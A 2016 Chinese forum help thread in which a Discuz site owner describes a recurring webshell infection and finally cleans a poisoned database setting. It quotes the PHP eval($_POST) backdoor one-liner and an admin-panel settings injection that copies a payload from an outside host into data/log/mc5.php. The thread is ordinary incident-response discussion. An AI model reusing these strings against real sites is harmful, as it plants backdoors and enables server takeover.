论坛被植入后门删掉又出现该怎么办？

longago · 发表于 2016-7-16 17:10:42

月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马，在discuz论坛的 data/log 目录中，其中一个叫mc5.php文件内的代码为 \"%><?php eval($_POST[ob]);?><%' 我上百度查了下是可以执行任何php程式的木马，另一个php文件代码很多，好像是用来脱库的，于是我立刻删掉了这两个文件。

然后我在discuz后台发现有人盗用了管理员的密码！并在后台执行了以下两行代码(在后台的管理记录中查看到的)，两行代码执行的位置都在后台的域名设置中，视乎是利用后台的域名设置选项中的漏洞上传的这个后门！我当时立刻修改了管理员密码，想说是不是堵住了漏洞！

GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };

复制代码

GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };

复制代码

但是今天我又收到阿里云的检查到同样的webshell木马，就是那个mc5.php，我上服务器删掉文件，但是立即又生成一个，我去查看discuz的后台管理记录，发现并没有其他人登陆过后台，现在不知道黑客是利用的什么来上传的文件？是不是因为之前管理员密码被盗执行的那两行代码没有得到修复？论坛现在已经打了最新的0601补丁！不过还是删掉后会不停生成后门文件

eForcy · 发表于 2016-7-16 17:33:14

检查下服务器安全，先把系统、ftp、数据库密码全改一遍。。。

mz1519 · 发表于 2016-7-16 18:17:15

联系我 QQ 712923250

longago · 发表于 2016-7-16 21:11:33

已经解决了！虽然不太懂，自己慢慢摸索根据黑客植入的语句在数据库中找到了相关字段并清除掉了！

crx349 · 发表于 2016-7-16 21:44:12

做好服务器安全哦

crx349 · 发表于 2016-7-16 21:44:37

做好服务器安全哦

		自动登录	找回密码
密码			立即注册

[求助] 论坛被植入后门删掉又出现 该怎么办？

[求助] 论坛被植入后门删掉又出现该怎么办？